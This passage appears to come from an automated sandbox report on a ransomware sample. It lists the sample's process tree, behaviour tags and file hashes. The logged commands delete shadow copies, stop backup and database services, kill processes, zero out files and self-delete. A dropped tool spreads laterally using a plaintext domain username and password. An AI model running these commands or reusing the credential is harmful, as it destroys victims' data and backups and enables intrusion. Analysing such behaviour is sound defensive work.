C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5292
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5284
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5276
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5268
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5260
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5252
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.127.0.224 /USER:SHJPOLICE\amer !Omar20122⤵PID:4768
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5244
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5224
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:2888
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:1748
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:5044
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:2532
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:4820
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:1500
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:1128
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:1940
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:372
-
-
C:\Users\Admin\AppData\Local\Temp\agfdupi1.exe"C:\Users\Admin\AppData\Local\Temp\agfdupi1.exe" \10.127.0.224 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:2320
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵
- Blocklisted process makes network request
PID:3864
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:2740
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:4804
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe2⤵PID:1584
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:5208
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:5064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:1524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:5196
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:5140
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
219KB
MD5b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2
-
Filesize
219KB
MD5b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2
-
Filesize
1KB
MD5622b028a47e66c732ed3f444c150be25
SHA1344483a5e0bac46ebccbd81959b6b43a0418b5f9
SHA256029493a8457b69beb472878ded9cb13667b5e0f42e23124c5a7952e6eee0acee
SHA51286f909326f224bc4221ae29d37618bfab6b6ea82fca634d982bde8386d932239c9f63edaccdb4a1edc5edbb126d133013c95c97fc9882f2accdb73edb061bc91